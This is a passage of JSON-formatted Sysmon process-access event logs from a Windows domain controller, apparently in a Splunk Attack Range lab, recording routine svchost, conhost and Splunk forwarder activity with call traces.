M32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:58:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:58:44","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4278,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:58:44.016\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:58:44.016","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:58:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:58:44","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4279,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:58:44.016\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:58:44.016","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:58:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:58:44","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4280,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:58:44.016\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:58:44.016","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:58:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:58:44","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4281,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:58:44.016\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:58:44.016","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:58:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:58:44","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4282,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:58:44.016\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:58:44.016","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:58:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:58:44","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4283,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:58:44.016\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:58:44.016","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:58:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:58:44","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4284,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:58:44.016\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:58:44.016","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:58:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:58:44","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4285,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:58:44.016\r\nSourceProcessGUID: {41C8662E-1FF3-5F25-0000-001093590500}\r\nSourceProcessId: 4448\r\nSourceThreadId: 4424\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {41C8662E-20B4-5F25-0000-001030530600}\r\nTargetProcessId: 816\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:58:44.016","SourceProcessGUID":"{41C8662E-1FF3-5F25-0000-001093590500}","SourceProcessId":"4448","SourceThreadId":"4424","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{41C8662E-20B4-5F25-0000-001030530600}","TargetProcessId":"816","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:58:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:58:44","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4286,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:58:44.157\r\nSourceProcessGUID: {41C8662E-20B4-5F25-0000-001030530600}\r\nSourceProcessId: 816\r\nSourceThreadId: 1344\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe\r\nTargetProcessGUID: {41C8662E-1FF3-5F25-0000-00109F540500}\r\nTargetProcessId: 4576\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nGrantedAccess: 0x101400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Program 